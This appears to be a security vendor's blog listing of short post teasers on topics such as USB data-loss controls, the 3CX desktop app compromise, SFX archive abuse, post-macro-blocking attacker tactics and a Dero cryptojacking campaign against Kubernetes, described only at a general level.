CrowdStrike is delivering powerful new file movement visibility features in CrowdStrike Falcon Device Control to help customers identify and mitigate the risk of data loss through USB devices.
We are excited to collaborate with IBM, which today unveils its new IBM z16 and LinuxONE Rockhopper 4 single frame and rack mount models, available globally on May 17, 2023. Powered by IBM’s Telum processor, these new configurations are designed for highly efficient data centers with sustainability in mind. CrowdStrike customers can make more effective use of their data center space while remaining resilient in the midst of ongoing global uncertainty.
Self-extracting (SFX) archive files have long served the legitimate purpose of easily sharing compressed files with someone who lacks the software to decompress and view the contents of a regular archive file. However, SFX archive files can also contain hidden malicious functionality that may not be immediately visible to the file’s recipient, and could be missed by technology-based detections alone.
We will continue to update on this dynamic situation as more details become available. CrowdStrike’s Intelligence team is in contact with 3CX. On March 29, 2023, CrowdStrike observed unexpected malicious activity emanating from a legitimate, signed binary, 3CXDesktopApp — a softphone application from 3CX. The malicious activity includes beaconing to actor-controlled infrastructure, deployment of second-stage payloads, and, in a small number of cases, hands-on-keyboard activity.
Cybersecurity is often about making progress: Progress in the way organizations procure, deploy and manage software; in the new skills and techniques teams acquire to run their cybersecurity programs; and in stopping breaches to protect hard-earned productivity gains.
According to the AV-TEST Institute, more than 1 billion strains of malware have been created, and more than 500,00 new pieces of malware are detected every day. One of the main reasons for this rapid growth is that malware creators frequently reuse source code. They modify existing malware to meet the specific objectives of an attack campaign or to avoid signature-based detection.
From the CISO perspective, identity security is one of the top security challenges, driven by the adversary’s increased use of stolen credentials to target and infiltrate organizations. The data bears this out: according to the CrowdStrike 2023 Global Threat Report, 80% of attacks use compromised identities, while advertisements for access broker services jumped 112% in 2022.
In November 20211 and February 2022,2 Microsoft announced that by default it would block Excel 4 and VBA macros in files that were downloaded from the internet. Following these changes, CrowdStrike Intelligence and the CrowdStrike Falcon® Complete managed detection and response team observed eCrime adversaries that had previously relied on macro execution for malware delivery adapt their tactics, techniques and procedures (TTPs).
CrowdStrike has discovered the first-ever Dero cryptojacking operation targeting Kubernetes infrastructure. Dero is a relatively new and privacy-focused cryptocurrency that uses directed acyclic graph (DAG) technology to claim complete anonymity of its transactions. The combination of anonymity and the higher rewards ratio makes it potentially lucrative to cryptojacking groups compared to Monero, which is commonly used cryptocurrency by attackers or groups running miner operations.
With so many threat intelligence solutions on the market today, it raises the question: What is threat intelligence and why do you need it? I won’t go into detail about what threat intelligence is; you can read about that here. Instead, I want to focus on the threat intelligence maturity journey — specifically, how advanced your organization is with respect to threat intelligence adoption and which CrowdStrike solution may be right for you.
